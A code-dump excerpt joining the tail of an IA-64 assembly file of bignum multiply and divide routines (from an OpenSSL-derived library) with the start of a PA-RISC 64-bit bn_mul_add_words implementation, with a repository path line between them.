xma.lu f77=f39,f123,f77
add r22=r22,r21 };;
{ .mfi; getf.sig r27=f83
xma.hu f88=f39,f124,f87
(p7) add carry2=1,carry2 }
{ .mfi; cmp.ltu p7,p0=r22,r21
xma.lu f87=f39,f124,f87
add r22=r22,carry1 };;
{ .mfi; getf.sig r28=f74
xma.hu f98=f39,f125,f97
(p7) add carry2=1,carry2 }
{ .mfi; xma.lu f97=f39,f125,f97
cmp.ltu p7,p0=r22,carry1 };;
{ .mfi; getf.sig r29=f65
xma.hu f108=f39,f126,f107
(p7) add carry2=1,carry2 }
{ .mfi; st8 [r32]=r22,16
xma.lu f107=f39,f126,f107 };;
{ .mfi; getf.sig r30=f56
xma.hu f118=f39,f127,f117 }
{ .mfi; xma.lu f117=f39,f127,f117 };;//
//-------------------------------------------------//
// Leaving muliplier's heaven... Quite a ride, huh?
{ .mii; getf.sig r31=f47
add r25=r25,r24
mov carry1=0 };;
{ .mii; getf.sig r16=f111
cmp.ltu p6,p0=r25,r24
add r26=r26,r25 };;
{ .mfb; getf.sig r17=f102 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r26,r25
add r27=r27,r26 };;
{ .mfb; nop.m 0x0 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r27,r26
add r28=r28,r27 };;
{ .mii; getf.sig r18=f93
add r17=r17,r16
mov carry3=0 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r28,r27
add r29=r29,r28 };;
{ .mii; getf.sig r19=f84
cmp.ltu p7,p0=r17,r16 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r29,r28
add r30=r30,r29 };;
{ .mii; getf.sig r20=f75
add r18=r18,r17 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r30,r29
add r31=r31,r30 };;
{ .mfb; getf.sig r21=f66 }
{ .mii; (p7) add carry3=1,carry3
cmp.ltu p7,p0=r18,r17
add r19=r19,r18 }
{ .mfb; nop.m 0x0 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r31,r30
add r31=r31,carry2 };;
{ .mfb; getf.sig r22=f57 }
{ .mii; (p7) add carry3=1,carry3
cmp.ltu p7,p0=r19,r18
add r20=r20,r19 }
{ .mfb; nop.m 0x0 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r31,carry2 };;
{ .mfb; getf.sig r23=f48 }
{ .mii; (p7) add carry3=1,carry3
cmp.ltu p7,p0=r20,r19
add r21=r21,r20 }
{ .mii;
(p6) add carry1=1,carry1 }
{ .mfb; st8 [r33]=r31,16 };;
{ .mfb; getf.sig r24=f112 }
{ .mii; (p7) add carry3=1,carry3
cmp.ltu p7,p0=r21,r20
add r22=r22,r21 };;
{ .mfb; getf.sig r25=f103 }
{ .mii; (p7) add carry3=1,carry3
cmp.ltu p7,p0=r22,r21
add r23=r23,r22 };;
{ .mfb; getf.sig r26=f94 }
{ .mii; (p7) add carry3=1,carry3
cmp.ltu p7,p0=r23,r22
add r23=r23,carry1 };;
{ .mfb; getf.sig r27=f85 }
{ .mii; (p7) add carry3=1,carry3
cmp.ltu p7,p8=r23,carry1};;
{ .mii; getf.sig r28=f76
add r25=r25,r24
mov carry1=0 }
{ .mii; st8 [r32]=r23,16
(p7) add carry2=1,carry3
(p8) add carry2=0,carry3 };;
{ .mfb; nop.m 0x0 }
{ .mii; getf.sig r29=f67
cmp.ltu p6,p0=r25,r24
add r26=r26,r25 };;
{ .mfb; getf.sig r30=f58 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r26,r25
add r27=r27,r26 };;
{ .mfb; getf.sig r16=f113 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r27,r26
add r28=r28,r27 };;
{ .mfb; getf.sig r17=f104 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r28,r27
add r29=r29,r28 };;
{ .mfb; getf.sig r18=f95 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r29,r28
add r30=r30,r29 };;
{ .mii; getf.sig r19=f86
add r17=r17,r16
mov carry3=0 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r30,r29
add r30=r30,carry2 };;
{ .mii; getf.sig r20=f77
cmp.ltu p7,p0=r17,r16
add r18=r18,r17 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r30,carry2 };;
{ .mfb; getf.sig r21=f68 }
{ .mii; st8 [r33]=r30,16
(p6) add carry1=1,carry1 };;
{ .mfb; getf.sig r24=f114 }
{ .mii; (p7) add carry3=1,carry3
cmp.ltu p7,p0=r18,r17
add r19=r19,r18 };;
{ .mfb; getf.sig r25=f105 }
{ .mii; (p7) add carry3=1,carry3
cmp.ltu p7,p0=r19,r18
add r20=r20,r19 };;
{ .mfb; getf.sig r26=f96 }
{ .mii; (p7) add carry3=1,carry3
cmp.ltu p7,p0=r20,r19
add r21=r21,r20 };;
{ .mfb; getf.sig r27=f87 }
{ .mii; (p7) add carry3=1,carry3
cmp.ltu p7,p0=r21,r20
add r21=r21,carry1 };;
{ .mib; getf.sig r28=f78
add r25=r25,r24 }
{ .mib; (p7) add carry3=1,carry3
cmp.ltu p7,p8=r21,carry1};;
{ .mii; st8 [r32]=r21,16
(p7) add carry2=1,carry3
(p8) add carry2=0,carry3 }
{ .mii; mov carry1=0
cmp.ltu p6,p0=r25,r24
add r26=r26,r25 };;
{ .mfb; getf.sig r16=f115 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r26,r25
add r27=r27,r26 };;
{ .mfb; getf.sig r17=f106 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r27,r26
add r28=r28,r27 };;
{ .mfb; getf.sig r18=f97 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r28,r27
add r28=r28,carry2 };;
{ .mib; getf.sig r19=f88
add r17=r17,r16 }
{ .mib;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r28,carry2 };;
{ .mii; st8 [r33]=r28,16
(p6) add carry1=1,carry1 }
{ .mii; mov carry2=0
cmp.ltu p7,p0=r17,r16
add r18=r18,r17 };;
{ .mfb; getf.sig r24=f116 }
{ .mii; (p7) add carry2=1,carry2
cmp.ltu p7,p0=r18,r17
add r19=r19,r18 };;
{ .mfb; getf.sig r25=f107 }
{ .mii; (p7) add carry2=1,carry2
cmp.ltu p7,p0=r19,r18
add r19=r19,carry1 };;
{ .mfb; getf.sig r26=f98 }
{ .mii; (p7) add carry2=1,carry2
cmp.ltu p7,p0=r19,carry1};;
{ .mii; st8 [r32]=r19,16
(p7) add carry2=1,carry2 }
{ .mfb; add r25=r25,r24 };;
{ .mfb; getf.sig r16=f117 }
{ .mii; mov carry1=0
cmp.ltu p6,p0=r25,r24
add r26=r26,r25 };;
{ .mfb; getf.sig r17=f108 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r26,r25
add r26=r26,carry2 };;
{ .mfb; nop.m 0x0 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r26,carry2 };;
{ .mii; st8 [r33]=r26,16
(p6) add carry1=1,carry1 }
{ .mfb; add r17=r17,r16 };;
{ .mfb; getf.sig r24=f118 }
{ .mii; mov carry2=0
cmp.ltu p7,p0=r17,r16
add r17=r17,carry1 };;
{ .mii; (p7) add carry2=1,carry2
cmp.ltu p7,p0=r17,carry1};;
{ .mii; st8 [r32]=r17
(p7) add carry2=1,carry2 };;
{ .mfb; add r24=r24,carry2 };;
{ .mib; st8 [r33]=r24 }
{ .mib; rum 1<<5 // clear um.mfh
br.ret.sptk.many b0 };;
.endp bn_mul_comba8#
#undef carry3
#undef carry2
#undef carry1
#endif
#if 1
// It's possible to make it faster (see comment to bn_sqr_comba8), but
// I reckon it doesn't worth the effort. Basically because the routine
// (actually both of them) practically never called... So I just play
// same trick as with bn_sqr_comba8.
//
// void bn_sqr_comba4(BN_ULONG *r, BN_ULONG *a)
//
.global bn_sqr_comba4#
.proc bn_sqr_comba4#
.align 64
bn_sqr_comba4:
.prologue
.save ar.pfs,r2
#if defined(_HPUX_SOURCE) && !defined(_LP64)
{ .mii; alloc r2=ar.pfs,2,1,0,0
addp4 r32=0,r32
addp4 r33=0,r33 };;
{ .mii;
#else
{ .mii; alloc r2=ar.pfs,2,1,0,0
#endif
mov r34=r33
add r14=8,r33 };;
.body
{ .mii; add r17=8,r34
add r15=16,r33
add r18=16,r34 }
{ .mfb; add r16=24,r33
br .L_cheat_entry_point4 };;
.endp bn_sqr_comba4#
#endif
#if 1
// Runs in ~115 cycles and ~4.5 times faster than C. Well, whatever...
//
// void bn_mul_comba4(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
//
#define carry1 r14
#define carry2 r15
.global bn_mul_comba4#
.proc bn_mul_comba4#
.align 64
bn_mul_comba4:
.prologue
.save ar.pfs,r2
#if defined(_HPUX_SOURCE) && !defined(_LP64)
{ .mii; alloc r2=ar.pfs,3,0,0,0
addp4 r33=0,r33
addp4 r34=0,r34 };;
{ .mii; addp4 r32=0,r32
#else
{ .mii; alloc r2=ar.pfs,3,0,0,0
#endif
add r14=8,r33
add r17=8,r34 }
.body
{ .mii; add r15=16,r33
add r18=16,r34
add r16=24,r33 };;
.L_cheat_entry_point4:
{ .mmi; add r19=24,r34
ldf8 f32=[r33] }
{ .mmi; ldf8 f120=[r34]
ldf8 f121=[r17] };;
{ .mmi; ldf8 f122=[r18]
ldf8 f123=[r19] }
{ .mmi; ldf8 f33=[r14]
ldf8 f34=[r15] }
{ .mfi; ldf8 f35=[r16]
xma.hu f41=f32,f120,f0 }
{ .mfi; xma.lu f40=f32,f120,f0 };;
{ .mfi; xma.hu f51=f32,f121,f0 }
{ .mfi; xma.lu f50=f32,f121,f0 };;
{ .mfi; xma.hu f61=f32,f122,f0 }
{ .mfi; xma.lu f60=f32,f122,f0 };;
{ .mfi; xma.hu f71=f32,f123,f0 }
{ .mfi; xma.lu f70=f32,f123,f0 };;//
// Major stall takes place here, and 3 more places below. Result from
// first xma is not available for another 3 ticks.
{ .mfi; getf.sig r16=f40
xma.hu f42=f33,f120,f41
add r33=8,r32 }
{ .mfi; xma.lu f41=f33,f120,f41 };;
{ .mfi; getf.sig r24=f50
xma.hu f52=f33,f121,f51 }
{ .mfi; xma.lu f51=f33,f121,f51 };;
{ .mfi; st8 [r32]=r16,16
xma.hu f62=f33,f122,f61 }
{ .mfi; xma.lu f61=f33,f122,f61 };;
{ .mfi; xma.hu f72=f33,f123,f71 }
{ .mfi; xma.lu f71=f33,f123,f71 };;//
//-------------------------------------------------//
{ .mfi; getf.sig r25=f41
xma.hu f43=f34,f120,f42 }
{ .mfi; xma.lu f42=f34,f120,f42 };;
{ .mfi; getf.sig r16=f60
xma.hu f53=f34,f121,f52 }
{ .mfi; xma.lu f52=f34,f121,f52 };;
{ .mfi; getf.sig r17=f51
xma.hu f63=f34,f122,f62
add r25=r25,r24 }
{ .mfi; mov carry1=0
xma.lu f62=f34,f122,f62 };;
{ .mfi; st8 [r33]=r25,16
xma.hu f73=f34,f123,f72
cmp.ltu p6,p0=r25,r24 }
{ .mfi; xma.lu f72=f34,f123,f72 };;//
//-------------------------------------------------//
{ .mfi; getf.sig r18=f42
xma.hu f44=f35,f120,f43
(p6) add carry1=1,carry1 }
{ .mfi; add r17=r17,r16
xma.lu f43=f35,f120,f43
mov carry2=0 };;
{ .mfi; getf.sig r24=f70
xma.hu f54=f35,f121,f53
cmp.ltu p7,p0=r17,r16 }
{ .mfi; xma.lu f53=f35,f121,f53 };;
{ .mfi; getf.sig r25=f61
xma.hu f64=f35,f122,f63
add r18=r18,r17 }
{ .mfi; xma.lu f63=f35,f122,f63
(p7) add carry2=1,carry2 };;
{ .mfi; getf.sig r26=f52
xma.hu f74=f35,f123,f73
cmp.ltu p7,p0=r18,r17 }
{ .mfi; xma.lu f73=f35,f123,f73
add r18=r18,carry1 };;
//-------------------------------------------------//
{ .mii; st8 [r32]=r18,16
(p7) add carry2=1,carry2
cmp.ltu p7,p0=r18,carry1 };;
{ .mfi; getf.sig r27=f43 // last major stall
(p7) add carry2=1,carry2 };;
{ .mii; getf.sig r16=f71
add r25=r25,r24
mov carry1=0 };;
{ .mii; getf.sig r17=f62
cmp.ltu p6,p0=r25,r24
add r26=r26,r25 };;
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r26,r25
add r27=r27,r26 };;
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r27,r26
add r27=r27,carry2 };;
{ .mii; getf.sig r18=f53
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r27,carry2 };;
{ .mfi; st8 [r33]=r27,16
(p6) add carry1=1,carry1 }
{ .mii; getf.sig r19=f44
add r17=r17,r16
mov carry2=0 };;
{ .mii; getf.sig r24=f72
cmp.ltu p7,p0=r17,r16
add r18=r18,r17 };;
{ .mii; (p7) add carry2=1,carry2
cmp.ltu p7,p0=r18,r17
add r19=r19,r18 };;
{ .mii; (p7) add carry2=1,carry2
cmp.ltu p7,p0=r19,r18
add r19=r19,carry1 };;
{ .mii; getf.sig r25=f63
(p7) add carry2=1,carry2
cmp.ltu p7,p0=r19,carry1};;
{ .mii; st8 [r32]=r19,16
(p7) add carry2=1,carry2 }
{ .mii; getf.sig r26=f54
add r25=r25,r24
mov carry1=0 };;
{ .mii; getf.sig r16=f73
cmp.ltu p6,p0=r25,r24
add r26=r26,r25 };;
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r26,r25
add r26=r26,carry2 };;
{ .mii; getf.sig r17=f64
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r26,carry2 };;
{ .mii; st8 [r33]=r26,16
(p6) add carry1=1,carry1 }
{ .mii; getf.sig r24=f74
add r17=r17,r16
mov carry2=0 };;
{ .mii; cmp.ltu p7,p0=r17,r16
add r17=r17,carry1 };;
{ .mii; (p7) add carry2=1,carry2
cmp.ltu p7,p0=r17,carry1};;
{ .mii; st8 [r32]=r17,16
(p7) add carry2=1,carry2 };;
{ .mii; add r24=r24,carry2 };;
{ .mii; st8 [r33]=r24 }
{ .mib; rum 1<<5 // clear um.mfh
br.ret.sptk.many b0 };;
.endp bn_mul_comba4#
#undef carry2
#undef carry1
#endif
#if 1
//
// BN_ULONG bn_div_words(BN_ULONG h, BN_ULONG l, BN_ULONG d)
//
// In the nutshell it's a port of my MIPS III/IV implementation.
//
#define AT r14
#define H r16
#define HH r20
#define L r17
#define D r18
#define DH r22
#define I r21
#if 0
// Some preprocessors (most notably HP-UX) appear to be allergic to
// macros enclosed to parenthesis [as these three were].
#define cont p16
#define break p0 // p20
#define equ p24
#else
cont=p16
break=p0
equ=p24
#endif
.global abort#
.global bn_div_words#
.proc bn_div_words#
.align 64
bn_div_words:
.prologue
.save ar.pfs,r2
{ .mii; alloc r2=ar.pfs,3,5,0,8
.save b0,r3
mov r3=b0
.save pr,r10
mov r10=pr };;
{ .mmb; cmp.eq p6,p0=r34,r0
mov r8=-1
(p6) br.ret.spnt.many b0 };;
.body
{ .mii; mov H=r32 // save h
mov ar.ec=0 // don't rotate at exit
mov pr.rot=0 }
{ .mii; mov L=r33 // save l
mov r36=r0 };;
.L_divw_shift: // -vv- note signed comparison
{ .mfi; (p0) cmp.lt p16,p0=r0,r34 // d
(p0) shladd r33=r34,1,r0 }
{ .mfb; (p0) add r35=1,r36
(p0) nop.f 0x0
(p16) br.wtop.dpnt .L_divw_shift };;
{ .mii; mov D=r34
shr.u DH=r34,32
sub r35=64,r36 };;
{ .mii; setf.sig f7=DH
shr.u AT=H,r35
mov I=r36 };;
{ .mib; cmp.ne p6,p0=r0,AT
shl H=H,r36
(p6) br.call.spnt.clr b0=abort };; // overflow, die...
{ .mfi; fcvt.xuf.s1 f7=f7
shr.u AT=L,r35 };;
{ .mii; shl L=L,r36
or H=H,AT };;
{ .mii; nop.m 0x0
cmp.leu p6,p0=D,H;;
(p6) sub H=H,D }
{ .mlx; setf.sig f14=D
movl AT=0xffffffff };;
///////////////////////////////////////////////////////////
{ .mii; setf.sig f6=H
shr.u HH=H,32;;
cmp.eq p6,p7=HH,DH };;
{ .mfb;
(p6) setf.sig f8=AT
(p7) fcvt.xuf.s1 f6=f6
(p7) br.call.sptk b6=.L_udiv64_32_b6 };;
{ .mfi; getf.sig r33=f8 // q
xmpy.lu f9=f8,f14 }
{ .mfi; xmpy.hu f10=f8,f14
shrp H=H,L,32 };;
{ .mmi; getf.sig r35=f9 // tl
getf.sig r31=f10 };; // th
.L_divw_1st_iter:
{ .mii; (p0) add r32=-1,r33
(p0) cmp.eq equ,cont=HH,r31 };;
{ .mii; (p0) cmp.ltu p8,p0=r35,D
(p0) sub r34=r35,D
(equ) cmp.leu break,cont=r35,H };;
{ .mib; (cont) cmp.leu cont,break=HH,r31
(p8) add r31=-1,r31
(cont) br.wtop.spnt .L_divw_1st_iter };;
///////////////////////////////////////////////////////////
{ .mii; sub H=H,r35
shl r8=r33,32
shl L=L,32 };;
///////////////////////////////////////////////////////////
{ .mii; setf.sig f6=H
shr.u HH=H,32;;
cmp.eq p6,p7=HH,DH };;
{ .mfb;
(p6) setf.sig f8=AT
(p7) fcvt.xuf.s1 f6=f6
(p7) br.call.sptk b6=.L_udiv64_32_b6 };;
{ .mfi; getf.sig r33=f8 // q
xmpy.lu f9=f8,f14 }
{ .mfi; xmpy.hu f10=f8,f14
shrp H=H,L,32 };;
{ .mmi; getf.sig r35=f9 // tl
getf.sig r31=f10 };; // th
.L_divw_2nd_iter:
{ .mii; (p0) add r32=-1,r33
(p0) cmp.eq equ,cont=HH,r31 };;
{ .mii; (p0) cmp.ltu p8,p0=r35,D
(p0) sub r34=r35,D
(equ) cmp.leu break,cont=r35,H };;
{ .mib; (cont) cmp.leu cont,break=HH,r31
(p8) add r31=-1,r31
(cont) br.wtop.spnt .L_divw_2nd_iter };;
///////////////////////////////////////////////////////////
{ .mii; sub H=H,r35
or r8=r8,r33
mov ar.pfs=r2 };;
{ .mii; shr.u r9=H,I // remainder if anybody wants it
mov pr=r10,0x1ffff }
{ .mfb; br.ret.sptk.many b0 };;
// Unsigned 64 by 32 (well, by 64 for the moment) bit integer division
// procedure.
//
// inputs: f6 = (double)a, f7 = (double)b
// output: f8 = (int)(a/b)
// clobbered: f8,f9,f10,f11,pred
pred=p15
// One can argue that this snippet is copyrighted to Intel
// Corporation, as it's essentially identical to one of those
// found in "Divide, Square Root and Remainder" section at
// http://www.intel.com/software/products/opensource/libraries/num.htm.
// Yes, I admit that the referred code was used as template,
// but after I realized that there hardly is any other instruction
// sequence which would perform this operation. I mean I figure that
// any independent attempt to implement high-performance division
// will result in code virtually identical to the Intel code. It
// should be noted though that below division kernel is 1 cycle
// faster than Intel one (note commented splits:-), not to mention
// original prologue (rather lack of one) and epilogue.
.align 32
.skip 16
.L_udiv64_32_b6:
frcpa.s1 f8,pred=f6,f7;; // [0] y0 = 1 / b
(pred) fnma.s1 f9=f7,f8,f1 // [5] e0 = 1 - b * y0
(pred) fmpy.s1 f10=f6,f8;; // [5] q0 = a * y0
(pred) fmpy.s1 f11=f9,f9 // [10] e1 = e0 * e0
(pred) fma.s1 f10=f9,f10,f10;; // [10] q1 = q0 + e0 * q0
(pred) fma.s1 f8=f9,f8,f8 //;; // [15] y1 = y0 + e0 * y0
(pred) fma.s1 f9=f11,f10,f10;; // [15] q2 = q1 + e1 * q1
(pred) fma.s1 f8=f11,f8,f8 //;; // [20] y2 = y1 + e1 * y1
(pred) fnma.s1 f10=f7,f9,f6;; // [20] r2 = a - b * q2
(pred) fma.s1 f8=f10,f8,f9;; // [25] q3 = q2 + r2 * y2
fcvt.fxu.trunc.s1 f8=f8 // [30] q = trunc(q3)
br.ret.sptk.many b6;;
.endp bn_div_words#
#endif
|
AIFM-sys/AIFM
| 46,674
|
shenango/apps/parsec/pkgs/libs/ssl/src/crypto/bn/asm/pa-risc2W.s
|
;
; PA-RISC 64-bit implementation of bn_asm code
;
; This code is approximately 2x faster than the C version
; for RSA/DSA.
;
; See http://devresource.hp.com/ for more details on the PA-RISC
; architecture. Also see the book "PA-RISC 2.0 Architecture"
; by Gerry Kane for information on the instruction set architecture.
;
; Code written by Chris Ruemmler (with some help from the HP C
; compiler).
;
; The code compiles with HP's assembler
;
.level 2.0W
.space $TEXT$
.subspa $CODE$,QUAD=0,ALIGN=8,ACCESS=0x2c,CODE_ONLY
;
; Global Register definitions used for the routines.
;
; Some information about HP's runtime architecture for 64-bits.
;
; "Caller save" means the calling function must save the register
; if it wants the register to be preserved.
; "Callee save" means if a function uses the register, it must save
; the value before using it.
;
; For the floating point registers
;
; "caller save" registers: fr4-fr11, fr22-fr31
; "callee save" registers: fr12-fr21
; "special" registers: fr0-fr3 (status and exception registers)
;
; For the integer registers
; value zero : r0
; "caller save" registers: r1,r19-r26
; "callee save" registers: r3-r18
; return register : r2 (rp)
; return values ; r28 (ret0,ret1)
; Stack pointer ; r30 (sp)
; global data pointer ; r27 (dp)
; argument pointer ; r29 (ap)
; millicode return ptr ; r31 (also a caller save register)
;
; Arguments to the routines
;
r_ptr .reg %r26
a_ptr .reg %r25
b_ptr .reg %r24
num .reg %r24
w .reg %r23
n .reg %r23
;
; Globals used in some routines
;
top_overflow .reg %r29
high_mask .reg %r22 ; value 0xffffffff80000000L
;------------------------------------------------------------------------------
;
; bn_mul_add_words
;
;BN_ULONG bn_mul_add_words(BN_ULONG *r_ptr, BN_ULONG *a_ptr,
; int num, BN_ULONG w)
;
; arg0 = r_ptr
; arg1 = a_ptr
; arg2 = num
; arg3 = w
;
; Local register definitions
;
fm1 .reg %fr22
fm .reg %fr23
ht_temp .reg %fr24
ht_temp_1 .reg %fr25
lt_temp .reg %fr26
lt_temp_1 .reg %fr27
fm1_1 .reg %fr28
fm_1 .reg %fr29
fw_h .reg %fr7L
fw_l .reg %fr7R
fw .reg %fr7
fht_0 .reg %fr8L
flt_0 .reg %fr8R
t_float_0 .reg %fr8
fht_1 .reg %fr9L
flt_1 .reg %fr9R
t_float_1 .reg %fr9
tmp_0 .reg %r31
tmp_1 .reg %r21
m_0 .reg %r20
m_1 .reg %r19
ht_0 .reg %r1
ht_1 .reg %r3
lt_0 .reg %r4
lt_1 .reg %r5
m1_0 .reg %r6
m1_1 .reg %r7
rp_val .reg %r8
rp_val_1 .reg %r9
bn_mul_add_words
.export bn_mul_add_words,entry,NO_RELOCATION,LONG_RETURN
.proc
.callinfo frame=128
.entry
.align 64
STD %r3,0(%sp) ; save r3
STD %r4,8(%sp) ; save r4
NOP ; Needed to make the loop 16-byte aligned
NOP ; Needed to make the loop 16-byte aligned
STD %r5,16(%sp) ; save r5
STD %r6,24(%sp) ; save r6
STD %r7,32(%sp) ; save r7
STD %r8,40(%sp) ; save r8
STD %r9,48(%sp) ; save r9
COPY %r0,%ret0 ; return 0 by default
DEPDI,Z 1,31,1,top_overflow ; top_overflow = 1 << 32
STD w,56(%sp) ; store w on stack
CMPIB,>= 0,num,bn_mul_add_words_exit ; if (num <= 0) then exit
LDO 128(%sp),%sp ; bump stack
;
; The loop is unrolled twice, so if there is only 1 number
; then go straight to the cleanup code.
;
CMPIB,= 1,num,bn_mul_add_words_single_top
FLDD -72(%sp),fw ; load up w into fp register fw (fw_h/fw_l)
;
; This loop is unrolled 2 times (64-byte aligned as well)
;
; PA-RISC 2.0 chips have two fully pipelined multipliers, thus
; two 32-bit mutiplies can be issued per cycle.
;
bn_mul_add_words_unroll2
FLDD 0(a_ptr),t_float_0 ; load up 64-bit value (fr8L) ht(L)/lt(R)
FLDD 8(a_ptr),t_float_1 ; load up 64-bit value (fr8L) ht(L)/lt(R)
LDD 0(r_ptr),rp_val ; rp[0]
LDD 8(r_ptr),rp_val_1 ; rp[1]
XMPYU fht_0,fw_l,fm1 ; m1[0] = fht_0*fw_l
XMPYU fht_1,fw_l,fm1_1 ; m1[1] = fht_1*fw_l
FSTD fm1,-16(%sp) ; -16(sp) = m1[0]
FSTD fm1_1,-48(%sp) ; -48(sp) = m1[1]
XMPYU flt_0,fw_h,fm ; m[0] = flt_0*fw_h
XMPYU flt_1,fw_h,fm_1 ; m[1] = flt_1*fw_h
FSTD fm,-8(%sp) ; -8(sp) = m[0]
FSTD fm_1,-40(%sp) ; -40(sp) = m[1]
XMPYU fht_0,fw_h,ht_temp ; ht_temp = fht_0*fw_h
XMPYU fht_1,fw_h,ht_temp_1 ; ht_temp_1 = fht_1*fw_h
FSTD ht_temp,-24(%sp) ; -24(sp) = ht_temp
FSTD ht_temp_1,-56(%sp) ; -56(sp) = ht_temp_1
XMPYU flt_0,fw_l,lt_temp ; lt_temp = lt*fw_l
XMPYU flt_1,fw_l,lt_temp_1 ; lt_temp = lt*fw_l
FSTD lt_temp,-32(%sp) ; -32(sp) = lt_temp
FSTD lt_temp_1,-64(%sp) ; -64(sp) = lt_temp_1
LDD -8(%sp),m_0 ; m[0]
LDD -40(%sp),m_1 ; m[1]
LDD -16(%sp),m1_0 ; m1[0]
LDD -48(%sp),m1_1 ; m1[1]
LDD -24(%sp),ht_0 ; ht[0]
LDD -56(%sp),ht_1 ; ht[1]
ADD,L m1_0,m_0,tmp_0 ; tmp_0 = m[0] + m1[0];
ADD,L m1_1,m_1,tmp_1 ; tmp_1 = m[1] + m1[1];
LDD -32(%sp),lt_0
LDD -64(%sp),lt_1
CMPCLR,*>>= tmp_0,m1_0, %r0 ; if (m[0] < m1[0])
ADD,L ht_0,top_overflow,ht_0 ; ht[0] += (1<<32)
CMPCLR,*>>= tmp_1,m1_1,%r0 ; if (m[1] < m1[1])
ADD,L ht_1,top_overflow,ht_1 ; ht[1] += (1<<32)
EXTRD,U tmp_0,31,32,m_0 ; m[0]>>32
DEPD,Z tmp_0,31,32,m1_0 ; m1[0] = m[0]<<32
EXTRD,U tmp_1,31,32,m_1 ; m[1]>>32
DEPD,Z tmp_1,31,32,m1_1 ; m1[1] = m[1]<<32
ADD,L ht_0,m_0,ht_0 ; ht[0]+= (m[0]>>32)
ADD,L ht_1,m_1,ht_1 ; ht[1]+= (m[1]>>32)
ADD lt_0,m1_0,lt_0 ; lt[0] = lt[0]+m1[0];
ADD,DC ht_0,%r0,ht_0 ; ht[0]++
ADD lt_1,m1_1,lt_1 ; lt[1] = lt[1]+m1[1];
ADD,DC ht_1,%r0,ht_1 ; ht[1]++
ADD %ret0,lt_0,lt_0 ; lt[0] = lt[0] + c;
ADD,DC ht_0,%r0,ht_0 ; ht[0]++
ADD lt_0,rp_val,lt_0 ; lt[0] = lt[0]+rp[0]
ADD,DC ht_0,%r0,ht_0 ; ht[0]++
LDO -2(num),num ; num = num - 2;
ADD ht_0,lt_1,lt_1 ; lt[1] = lt[1] + ht_0 (c);
ADD,DC ht_1,%r0,ht_1 ; ht[1]++
STD lt_0,0(r_ptr) ; rp[0] = lt[0]
ADD lt_1,rp_val_1,lt_1 ; lt[1] = lt[1]+rp[1]
ADD,DC ht_1,%r0,%ret0 ; ht[1]++
LDO 16(a_ptr),a_ptr ; a_ptr += 2
STD lt_1,8(r_ptr) ; rp[1] = lt[1]
CMPIB,<= 2,num,bn_mul_add_words_unroll2 ; go again if more to do
LDO 16(r_ptr),r_ptr ; r_ptr += 2
CMPIB,=,N 0,num,bn_mul_add_words_exit ; are we done, or cleanup last one
;
; Top of loop aligned on 64-byte boundary
;
bn_mul_add_words_single_top
FLDD 0(a_ptr),t_float_0 ; load up 64-bit value (fr8L) ht(L)/lt(R)
LDD 0(r_ptr),rp_val ; rp[0]
LDO 8(a_ptr),a_ptr ; a_ptr++
XMPYU fht_0,fw_l,fm1 ; m1 = ht*fw_l
FSTD fm1,-16(%sp) ; -16(sp) = m1
XMPYU flt_0,fw_h,fm ; m = lt*fw_h
FSTD fm,-8(%sp) ; -8(sp) = m
XMPYU fht_0,fw_h,ht_temp ; ht_temp = ht*fw_h
FSTD ht_temp,-24(%sp) ; -24(sp) = ht
XMPYU flt_0,fw_l,lt_temp ; lt_temp = lt*fw_l
FSTD lt_temp,-32(%sp) ; -32(sp) = lt
LDD -8(%sp),m_0
LDD -16(%sp),m1_0 ; m1 = temp1
ADD,L m_0,m1_0,tmp_0 ; tmp_0 = m + m1;
LDD -24(%sp),ht_0
LDD -32(%sp),lt_0
CMPCLR,*>>= tmp_0,m1_0,%r0 ; if (m < m1)
ADD,L ht_0,top_overflow,ht_0 ; ht += (1<<32)
EXTRD,U tmp_0,31,32,m_0 ; m>>32
DEPD,Z tmp_0,31,32,m1_0 ; m1 = m<<32
ADD,L ht_0,m_0,ht_0 ; ht+= (m>>32)
ADD lt_0,m1_0,tmp_0 ; tmp_0 = lt+m1;
ADD,DC ht_0,%r0,ht_0 ; ht++
ADD %ret0,tmp_0,lt_0 ; lt = lt + c;
ADD,DC ht_0,%r0,ht_0 ; ht++
ADD lt_0,rp_val,lt_0 ; lt = lt+rp[0]
ADD,DC ht_0,%r0,%ret0 ; ht++
STD lt_0,0(r_ptr) ; rp[0] = lt
bn_mul_add_words_exit
.EXIT
LDD -80(%sp),%r9 ; restore r9
LDD -88(%sp),%r8 ; restore r8
LDD -96(%sp),%r7 ; restore r7
LDD -104(%sp),%r6 ; restore r6
LDD -112(%sp),%r5 ; restore r5
LDD -120(%sp),%r4 ; restore r4
BVE (%rp)
LDD,MB -128(%sp),%r3 ; restore r3
.PROCEND ;in=23,24,25,26,29;out=28;
;----------------------------------------------------------------------------
;
;BN_ULONG bn_mul_words(BN_ULONG *rp, BN_ULONG *ap, int num, BN_ULONG w)
;
; arg0 = rp
; arg1 = ap
; arg2 = num
; arg3 = w
bn_mul_words
